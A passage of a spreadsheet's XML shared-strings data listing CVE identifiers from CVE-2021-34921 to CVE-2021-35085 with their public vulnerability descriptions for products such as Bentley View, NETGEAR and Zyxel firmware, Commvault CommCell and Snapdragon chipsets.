  </si>
  <si>
    <t>CVE-2021-34921</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899.</t>
  </si>
  <si>
    <t>CVE-2021-34922</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4900.</t>
  </si>
  <si>
    <t>CVE-2021-34923</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901.</t>
  </si>
  <si>
    <t>CVE-2021-34924</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902.</t>
  </si>
  <si>
    <t>CVE-2021-34925</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proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-14903.</t>
  </si>
  <si>
    <t>CVE-2021-34926</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904.</t>
  </si>
  <si>
    <t>CVE-2021-34927</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read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-14905.</t>
  </si>
  <si>
    <t>CVE-2021-34928</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906.</t>
  </si>
  <si>
    <t>CVE-2021-34929</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907.</t>
  </si>
  <si>
    <t>CVE-2021-3493</t>
  </si>
  <si>
    <t>The overlayfs implementation in the linux kernel did not properly validate with respect to user namespaces the setting of file capabilities on files in an underlying file system. Due to the combination of unprivileged user namespaces along with a patch carried in the Ubuntu kernel to allow unprivileged overlay mounts, an attacker could use this to gain elevated privileges.</t>
  </si>
  <si>
    <t>CVE-2021-34930</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read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-14908.</t>
  </si>
  <si>
    <t>CVE-2021-34931</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4909.</t>
  </si>
  <si>
    <t>CVE-2021-34932</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910.</t>
  </si>
  <si>
    <t>CVE-2021-34933</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4911.</t>
  </si>
  <si>
    <t>CVE-2021-34934</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proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-14912.</t>
  </si>
  <si>
    <t>CVE-2021-34935</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4913.</t>
  </si>
  <si>
    <t>CVE-2021-34936</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4914.</t>
  </si>
  <si>
    <t>CVE-2021-34937</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4915.</t>
  </si>
  <si>
    <t>CVE-2021-34938</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proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-14995.</t>
  </si>
  <si>
    <t>CVE-2021-34939</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validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-14996.</t>
  </si>
  <si>
    <t>CVE-2021-3494</t>
  </si>
  <si>
    <t>A smart proxy that provides a restful API to various sub-systems of the Foreman is affected by the flaw which can cause a Man-in-the-Middle attack. The FreeIPA module of Foreman smart proxy does not check the SSL certificate, thus, an unauthenticated attacker can perform actions in FreeIPA if certain conditions are met. The highest threat from this flaw is to system confidentiality. This flaw affects Foreman versions before 2.5.0.</t>
  </si>
  <si>
    <t>CVE-2021-34940</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write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-15039.</t>
  </si>
  <si>
    <t>CVE-2021-34941</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proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-15040.</t>
  </si>
  <si>
    <t>CVE-2021-34942</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read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-15041.</t>
  </si>
  <si>
    <t>CVE-2021-34943</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JT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051.</t>
  </si>
  <si>
    <t>CVE-2021-34944</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of Bentley View 10.15.0.75. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of JT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5052.</t>
  </si>
  <si>
    <t>CVE-2021-34945</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The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-15054.</t>
  </si>
  <si>
    <t>CVE-2021-34946</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Bentley View 10.15.0.75. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of JT files. Crafted data in a JT file can trigger a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-15055.</t>
  </si>
  <si>
    <t>CVE-2021-3495</t>
  </si>
  <si>
    <t>An incorrect access control flaw was found in the kiali-operator in versions before 1.33.0 and before 1.24.7. This flaw allows an attacker with a basic level of access to the cluster (to deploy a kiali operand) to use this vulnerability and deploy a given image to anywhere in the cluster, potentially gaining access to privileged service account tokens. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2021-3496</t>
  </si>
  <si>
    <t>A heap-based buffer overflow was found in jhead in version 3.06 in Get16u() in exif.c when processing a crafted file.</t>
  </si>
  <si>
    <t>CVE-2021-3497</t>
  </si>
  <si>
    <t>GStreamer before 1.18.4 might access already-freed memory in error code paths when demuxing certain malformed Matroska files.</t>
  </si>
  <si>
    <t>CVE-2021-34977</t>
  </si>
  <si>
    <t>This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R7000 1.0.11.116_10.2.100 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the processing of SOAP requests. The issue results from the lack of proper authentication verification before performing a password reset. An attacker can leverage this vulnerability to reset the admin password. Was ZDI-CAN-13483.</t>
  </si>
  <si>
    <t>CVE-2021-34978</t>
  </si>
  <si>
    <t>This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of NETGEAR R6260 1.1.0.78_1.0.1 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the setupwizard.cgi page. A crafted SOAP request can trigger an overflow of a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-13511.</t>
  </si>
  <si>
    <t>CVE-2021-34979</t>
  </si>
  <si>
    <t>This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of NETGEAR R6260 1.1.0.78_1.0.1 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of SOAP requests. When parsing the SOAPAction header, the process does not properly validate the length of user-supplied data prior to copying it to a fixed-length buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-13512.</t>
  </si>
  <si>
    <t>CVE-2021-3498</t>
  </si>
  <si>
    <t>GStreamer before 1.18.4 might cause heap corruption when parsing certain malformed Matroska files.</t>
  </si>
  <si>
    <t>CVE-2021-34980</t>
  </si>
  <si>
    <t>This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of NETGEAR R6260 1.1.0.78_1.0.1 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the setupwizard.cgi page. When parsing the SOAP_LOGIN_TOKEN environment variable, the process does not properly validate the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-14107.</t>
  </si>
  <si>
    <t>CVE-2021-34984</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of Bentley ContextCapture 10.18.0.232. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of OBJ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4784.</t>
  </si>
  <si>
    <t>CVE-2021-34985</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of Bentley ContextCapture 10.18.0.232. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of OBJ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14785.</t>
  </si>
  <si>
    <t>CVE-2021-34986</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to escalate privileges on affected installations of Parallels Desktop 16.5.0 (49183). An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the Parallels Service. By creating a symbolic link, an attacker can abuse the service to execute a file. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of root. Was ZDI-CAN-13932.</t>
  </si>
  <si>
    <t>CVE-2021-34987</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to escalate privileges on affected installations of Parallels Desktop 16.5.1 (49187). An attacker must first obtain the ability to execute high-privileged code on the target guest system in order to exploit this vulnerability. The specific flaw exists within the HDAudio virtual device. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length buffer. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the hypervisor. Was ZDI-CAN-14969.</t>
  </si>
  <si>
    <t>CVE-2021-3499</t>
  </si>
  <si>
    <t>A vulnerability was found in OVN Kubernetes in versions up to and including 0.3.0 where the Egress Firewall does not reliably apply firewall rules when there is multiple DNS rules. It could lead to potentially lose of confidentiality, integrity or availability of a service.</t>
  </si>
  <si>
    <t>CVE-2021-34991</t>
  </si>
  <si>
    <t>This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of NETGEAR R6400v2 1.0.4.106_10.0.80 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the UPnP service, which listens on TCP port 5000 by default. When parsing the uuid request header, the process does not properly validate the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-14110.</t>
  </si>
  <si>
    <t>CVE-2021-34992</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Orckestra C1 CMS 6.10. Authentication is required to exploit this vulnerability. The specific flaw exists within Composite.dll. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-14740.</t>
  </si>
  <si>
    <t>CVE-2021-34993</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to bypass authentication on affected installations of Commvault CommCell 11.22.22. Authentication is not required to exploit this vulnerability. The specific flaw exists within the CVSearchService service. The issue results from the lack of proper validation prior to authentication. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-13706.</t>
  </si>
  <si>
    <t>CVE-2021-34994</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Commvault CommCell 11.22.22. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the DataProvider class. The issue results from the lack of proper validation of a user-supplied string before executing it as JavaScript code. An attacker can leverage this vulnerability to escape the JavaScript sandbox and execute Java code in the context of NETWORK SERVICE. Was ZDI-CAN-13755.</t>
  </si>
  <si>
    <t>CVE-2021-34995</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Commvault CommCell 11.22.22. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the DownloadCenterUploadHandler class. The issue results from the lack of proper validation of user-supplied data, which can allow the upload of arbitrary files. An attacker can leverage this vulnerability to execute code in the context of NETWORK SERVICE. Was ZDI-CAN-13756.</t>
  </si>
  <si>
    <t>CVE-2021-34996</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Commvault CommCell 11.22.22. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the Demo_ExecuteProcessOnGroup workflow. By creating a workflow, an attacker can specify an arbitrary command to be executed. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-13889.</t>
  </si>
  <si>
    <t>CVE-2021-34997</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Commvault CommCell 11.22.22. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the AppStudioUploadHandler class. The issue results from the lack of proper validation of user-supplied data, which can allow the upload of arbitrary files. An attacker can leverage this vulnerability to execute code in the context of NETWORK SERVICE. Was ZDI-CAN-13894.</t>
  </si>
  <si>
    <t>CVE-2021-34998</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to escalate privileges on affected installations of Panda Security Free Antivirus 20.2.0.0. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the use of named pipes. The issue results from allowing an untrusted process to impersonate the client of a pipe. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-14208.</t>
  </si>
  <si>
    <t>CVE-2021-3500</t>
  </si>
  <si>
    <t>A flaw was found in djvulibre-3.5.28 and earlier. A Stack overflow in function DJVU::DjVuDocument::get_djvu_file() via crafted djvu file may lead to application crash and other consequences.</t>
  </si>
  <si>
    <t>CVE-2021-35003</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of TP-Link Archer C90 1.0.6 Build 20200114 rel.73164(5553) routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of DNS responses. A crafted DNS message can trigger an overflow of a fixed-length, stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-14655.</t>
  </si>
  <si>
    <t>CVE-2021-35004</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of TP-Link TL-WA1201 1.0.1 Build 20200709 rel.66244(5553) wireless access points. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of DNS responses. A crafted DNS message can trigger an overflow of a fixed-length, stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-14656.</t>
  </si>
  <si>
    <t>CVE-2021-35005</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to disclose sensitive information on affected installations of TeamViewer. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the TeamViewer service. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated array. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-13818.</t>
  </si>
  <si>
    <t>CVE-2021-3501</t>
  </si>
  <si>
    <t>A flaw was found in the Linux kernel in versions before 5.12. The value of internal.ndata, in the KVM API, is mapped to an array index, which can be updated by a user process at anytime which could lead to an out-of-bounds write. The highest threat from this vulnerability is to data integrity and system availability.</t>
  </si>
  <si>
    <t>CVE-2021-3502</t>
  </si>
  <si>
    <t>A flaw was found in avahi 0.8-5. A reachable assertion is present in avahi_s_host_name_resolver_start function allowing a local attacker to crash the avahi service by requesting hostname resolutions through the avahi socket or dbus methods for invalid hostnames. The highest threat from this vulnerability is to the service availability.</t>
  </si>
  <si>
    <t>CVE-2021-35027</t>
  </si>
  <si>
    <t>A directory traversal vulnerability in the web server of the Zyxel VPN2S firmware version 1.12 could allow a remote attacker to gain access to sensitive information.</t>
  </si>
  <si>
    <t>CVE-2021-35028</t>
  </si>
  <si>
    <t>A command injection vulnerability in the CGI program of the Zyxel VPN2S firmware version 1.12 could allow an authenticated, local user to execute arbitrary OS commands.</t>
  </si>
  <si>
    <t>CVE-2021-35029</t>
  </si>
  <si>
    <t>An authentication bypasss vulnerability in the web-based management interface of Zyxel USG/Zywall series firmware versions 4.35 through 4.64 and USG Flex, ATP, and VPN series firmware versions 4.35 through 5.01, which could allow a remote attacker to execute arbitrary commands on an affected device.</t>
  </si>
  <si>
    <t>CVE-2021-3503</t>
  </si>
  <si>
    <t>A flaw was found in Wildfly where insufficient RBAC restrictions may lead to expose metrics data. The highest threat from this vulnerability is to the confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-35030</t>
  </si>
  <si>
    <t>A vulnerability was found in the CGI program in Zyxel GS1900-8 firmware version V2.60, that did not properly sterilize packet contents and could allow an authenticated, local user to perform a cross-site scripting (XSS) attack via a crafted LLDP packet.</t>
  </si>
  <si>
    <t>CVE-2021-35031</t>
  </si>
  <si>
    <t>A vulnerability in the TFTP client of Zyxel GS1900 series firmware, XGS1210 series firmware, and XGS1250 series firmware, which could allow an authenticated LAN user to execute arbitrary OS commands via the GUI of the vulnerable device.</t>
  </si>
  <si>
    <t>CVE-2021-35032</t>
  </si>
  <si>
    <t>A vulnerability in the 'libsal.so' of the Zyxel GS1900 series firmware version 2.60 could allow an authenticated local user to execute arbitrary OS commands via a crafted function call.</t>
  </si>
  <si>
    <t>CVE-2021-35033</t>
  </si>
  <si>
    <t>A vulnerability in specific versions of Zyxel NBG6818, NBG7815, WSQ20, WSQ50, WSQ60, and WSR30 firmware with pre-configured password management could allow an attacker to obtain root access of the device, if the local attacker dismantles the device and uses a USB-to-UART cable to connect the device, or if the remote assistance feature had been enabled by an authenticated user.</t>
  </si>
  <si>
    <t>CVE-2021-35034</t>
  </si>
  <si>
    <t>An insufficient session expiration vulnerability in the CGI program of the Zyxel NBG6604 firmware could allow a remote attacker to access the device if the correct token can be intercepted.</t>
  </si>
  <si>
    <t>CVE-2021-35035</t>
  </si>
  <si>
    <t>A cleartext storage of sensitive information vulnerability in the Zyxel NBG6604 firmware could allow a remote, authenticated attacker to obtain sensitive information from the configuration file.</t>
  </si>
  <si>
    <t>CVE-2021-35036</t>
  </si>
  <si>
    <t>A cleartext storage of information vulnerability in the Zyxel VMG3625-T50B firmware version V5.50(ABTL.0)b2k could allow an authenticated attacker to obtain sensitive information from the configuration file.</t>
  </si>
  <si>
    <t>CVE-2021-35037</t>
  </si>
  <si>
    <t>Jamf Pro before 10.30.1 allows for an unvalidated URL redirect vulnerability affecting Jamf Pro customers who host their environments on-premises. An attacker may craft a URL that appears to be for a customer's Jamf Pro instance, but when clicked will forward a user to an arbitrary URL that may be malicious. This is tracked via Jamf with the following ID: PI-009822</t>
  </si>
  <si>
    <t>CVE-2021-35039</t>
  </si>
  <si>
    <t>kernel/module.c in the Linux kernel before 5.12.14 mishandles Signature Verification, aka CID-0c18f29aae7c. Without CONFIG_MODULE_SIG, verification that a kernel module is signed, for loading via init_module, does not occur for a module.sig_enforce=1 command-line argument.</t>
  </si>
  <si>
    <t>CVE-2021-3504</t>
  </si>
  <si>
    <t>A flaw was found in the hivex library in versions before 1.3.20. It is caused due to a lack of bounds check within the hivex_open function. An attacker could input a specially crafted Windows Registry (hive) file which would cause hivex to read memory beyond its normal bounds or cause the program to crash. The highest threat from this vulnerability is to system availability.</t>
  </si>
  <si>
    <t>CVE-2021-35041</t>
  </si>
  <si>
    <t>The blockchain node in FISCO-BCOS V2.7.2 may have a bug when dealing with unformatted packet and lead to a crash. A malicious node can send a packet continuously. The packet is in an incorrect format and cannot be decoded by the node correctly. As a result, the node may consume the memory sustainably and crash. More details are shown at: https://github.com/FISCO-BCOS/FISCO-BCOS/issues/1951</t>
  </si>
  <si>
    <t>CVE-2021-35042</t>
  </si>
  <si>
    <t>Django 3.1.x before 3.1.13 and 3.2.x before 3.2.5 allows QuerySet.order_by SQL injection if order_by is untrusted input from a client of a web application.</t>
  </si>
  <si>
    <t>CVE-2021-35043</t>
  </si>
  <si>
    <t>OWASP AntiSamy before 1.6.4 allows XSS via HTML attributes when using the HTML output serializer (XHTML is not affected). This was demonstrated by a javascript: URL with &amp;#00058 as the replacement for the : character.</t>
  </si>
  <si>
    <t>CVE-2021-35045</t>
  </si>
  <si>
    <t>Cross site scripting (XSS) vulnerability in Ice Hrm 29.0.0.OS, allows attackers to execute arbitrary code via the parameters to the /app/ endpoint.</t>
  </si>
  <si>
    <t>CVE-2021-35046</t>
  </si>
  <si>
    <t>A session fixation vulnerability was discovered in Ice Hrm 29.0.0 OS which allows an attacker to hijack a valid user session via a crafted session cookie.</t>
  </si>
  <si>
    <t>CVE-2021-35047</t>
  </si>
  <si>
    <t>Vulnerability in the CommandPost, Collector, and Sensor components of Fidelis Network and Deception enables an attacker with user level access to the CLI to inject root level commands into the component and neighboring Fidelis components. The vulnerability is present in Fidelis Network and Deception versions prior to 9.3.7 and in version 9.4. Patches and updates are available to address this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-35048</t>
  </si>
  <si>
    <t>Vulnerability in Fidelis Network and Deception CommandPost enables unauthenticated SQL injection through the web interface. The vulnerability could lead to exposure of authentication tokens in some versions of Fidelis software. The vulnerability is present in Fidelis Network and Deception versions prior to 9.3.7 and in version 9.4. Patches and updates are available to address this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-35049</t>
  </si>
  <si>
    <t>Vulnerability in Fidelis Network and Deception CommandPost enables authenticated command injection through the web interface. The vulnerability could allow a specially crafted HTTP request to execute system commands on the CommandPost and return results in an HTTP response in an authenticated session. The vulnerability is present in Fidelis Network and Deception versions prior to 9.3.7 and in version 9.4. Patches and updates are available to address this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-3505</t>
  </si>
  <si>
    <t>A flaw was found in libtpms in versions before 0.8.0. The TPM 2 implementation returns 2048 bit keys with ~1984 bit strength due to a bug in the TCG specification. The bug is in the key creation algorithm in RsaAdjustPrimeCandidate(), which is called before the prime number check. The highest threat from this vulnerability is to data confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-35050</t>
  </si>
  <si>
    <t>User credentials stored in a recoverable format within Fidelis Network and Deception CommandPost. In the event that an attacker gains access to the CommandPost, these values could be decoded and used to login to the application. The vulnerability is present in Fidelis Network and Deception versions prior to 9.3.3. This vulnerability has been addressed in version 9.3.3 and subsequent versions.</t>
  </si>
  <si>
    <t>CVE-2021-35052</t>
  </si>
  <si>
    <t>A component in Kaspersky Password Manager could allow an attacker to elevate a process Integrity level from Medium to High.</t>
  </si>
  <si>
    <t>CVE-2021-35053</t>
  </si>
  <si>
    <t>Possible system denial of service in case of arbitrary changing Firefox browser parameters. An attacker could change specific Firefox browser parameters file in a certain way and then reboot the system to make the system unbootable.</t>
  </si>
  <si>
    <t>CVE-2021-35054</t>
  </si>
  <si>
    <t>Minecraft before 1.17.1, when online-mode=false is configured, allows path traversal for deletion of arbitrary JSON files.</t>
  </si>
  <si>
    <t>CVE-2021-35055</t>
  </si>
  <si>
    <t>MediaTek microchips, as used in NETGEAR devices through 2021-11-11 and other devices, mishandle the WPS (Wi-Fi Protected Setup) protocol. (Affected Chipsets MT7603E, MT7610, MT7612, MT7613, MT7615, MT7620, MT7622, MT7628, MT7629, MT7915; Affected Software Versions 7.4.0.0; Out-of-bounds write).</t>
  </si>
  <si>
    <t>CVE-2021-35056</t>
  </si>
  <si>
    <t>Unisys Stealth 5.1 before 5.1.025.0 and 6.0 before 6.0.055.0 has an unquoted Windows search path for a scheduled task. An unintended executable might run.</t>
  </si>
  <si>
    <t>CVE-2021-35059</t>
  </si>
  <si>
    <t>OpenWay WAY4 ACS before 1.2.278-2693 allows XSS via the /way4acs/enroll action parameter.</t>
  </si>
  <si>
    <t>CVE-2021-3506</t>
  </si>
  <si>
    <t>An out-of-bounds (OOB) memory access flaw was found in fs/f2fs/node.c in the f2fs module in the Linux kernel in versions before 5.12.0-rc4. A bounds check failure allows a local attacker to gain access to out-of-bounds memory leading to a system crash or a leak of internal kernel information. The highest threat from this vulnerability is to system availability.</t>
  </si>
  <si>
    <t>CVE-2021-35060</t>
  </si>
  <si>
    <t>/way4acs/enroll in OpenWay WAY4 ACS before 1.2.278-2693 allows unauthenticated attackers to leverage response differences to discover whether a specific payment card number is stored in the system.</t>
  </si>
  <si>
    <t>CVE-2021-35061</t>
  </si>
  <si>
    <t>Multiple cross-site scripting (XSS) vulnerabilities in DRK Odenwaldkreis Testerfassung March-2021 allow remote attackers to inject arbitrary web script or HTML via all parameters to HTML form fields in all components.</t>
  </si>
  <si>
    <t>CVE-2021-35062</t>
  </si>
  <si>
    <t>A Shell Metacharacter Injection vulnerability in result.php in DRK Odenwaldkreis Testerfassung March-2021 allow an attacker with a valid token of a COVID-19 test result to execute shell commands with the permissions of the web server.</t>
  </si>
  <si>
    <t>CVE-2021-35063</t>
  </si>
  <si>
    <t>Suricata before 5.0.7 and 6.x before 6.0.3 has a "critical evasion."</t>
  </si>
  <si>
    <t>CVE-2021-35064</t>
  </si>
  <si>
    <t>KramerAV VIAWare, all tested versions, allow privilege escalation through misconfiguration of sudo. Sudoers permits running of multiple dangerous commands, including unzip, systemctl and dpkg.</t>
  </si>
  <si>
    <t>CVE-2021-35066</t>
  </si>
  <si>
    <t>An XXE vulnerability exists in ConnectWise Automate before 2021.0.6.132.</t>
  </si>
  <si>
    <t>CVE-2021-35067</t>
  </si>
  <si>
    <t>Meross MSG100 devices before 3.2.3 allow an attacker to replay the same data or similar data (e.g., an attacker who sniffs a Close message can transmit an acceptable Open message).</t>
  </si>
  <si>
    <t>CVE-2021-35068</t>
  </si>
  <si>
    <t>Lack of null check while freeing the device information buffer in the Bluetooth HFP protocol can lead to a NULL pointer dereference in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2021-35069</t>
  </si>
  <si>
    <t>Improper validation of data length received from DMA buffer can lead to memory corruption. in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2021-3507</t>
  </si>
  <si>
    <t>A heap buffer overflow was found in the floppy disk emulator of QEMU up to 6.0.0 (including). It could occur in fdctrl_transfer_handler() in hw/block/fdc.c while processing DMA read data transfers from the floppy drive to the guest system. A privileged guest user could use this flaw to crash the QEMU process on the host resulting in DoS scenario, or potential information leakage from the host memory.</t>
  </si>
  <si>
    <t>CVE-2021-35070</t>
  </si>
  <si>
    <t>RPM secure Stream can access any secure resource due to improper SMMU configuration and can lead to information disclosure in Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2021-35071</t>
  </si>
  <si>
    <t>Possible buffer over read due to lack of size validation while copying data from DBR buffer to RX buffer and can lead to Denial of Service in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2021-35072</t>
  </si>
  <si>
    <t>Possible buffer overflow due to improper validation of array index while processing external DIAG command in Snapdragon Auto, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2021-35073</t>
  </si>
  <si>
    <t>Possible assertion due to improper validation of rank restriction field in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2021-35074</t>
  </si>
  <si>
    <t>Possible integer overflow due to improper fragment datatype while calculating number of fragments in a request message in Snapdragon Auto, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2021-35075</t>
  </si>
  <si>
    <t>Possible null pointer dereference due to lack of WDOG structure validation during registration in Snapdragon Auto, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2021-35076</t>
  </si>
  <si>
    <t>Possible null pointer dereference due to improper validation of RRC connection reconfiguration message in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2021-35077</t>
  </si>
  <si>
    <t>Possible use after free scenario in compute offloads to DSP while multiple calls spawn a dynamic process in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2021-35078</t>
  </si>
  <si>
    <t>Possible memory leak due to improper validation of certificate chain length while parsing server certificate chain in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2021-35079</t>
  </si>
  <si>
    <t>Improper validation of permissions for third party application accessing Telephony service API can lead to information disclosure in Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2021-3508</t>
  </si>
  <si>
    <t>A flaw was found in PDFResurrect in version 0.22b. There is an infinite loop in get_xref_linear_skipped() in pdf.c via a crafted PDF file.</t>
  </si>
  <si>
    <t>CVE-2021-35080</t>
  </si>
  <si>
    <t>Disabled SMMU from secure side while RPM is assigned a secure stream can lead to information disclosure in Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2021-35081</t>
  </si>
  <si>
    <t>Possible buffer overflow due to improper validation of SSID length received from beacon or probe response during an IBSS session in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music</t>
  </si>
  <si>
    <t>CVE-2021-35082</t>
  </si>
  <si>
    <t>Improper integrity check can lead to race condition between tasks PDCP and RRC? right after a valid RRC security mode command packet has been received in Snapdragon Industrial IOT</t>
  </si>
  <si>
    <t>CVE-2021-35083</t>
  </si>
  <si>
    <t>Possible out of bound read due to improper validation of certificate chain in SSL or Internet key exchange in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2021-35084</t>
  </si>
  <si>
    <t>Possible out of bound read due to lack of length check of data length for a DIAG event in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music</t>
  </si>
  <si>
    <t>CVE-2021-35085</t>
  </si>
  <si>
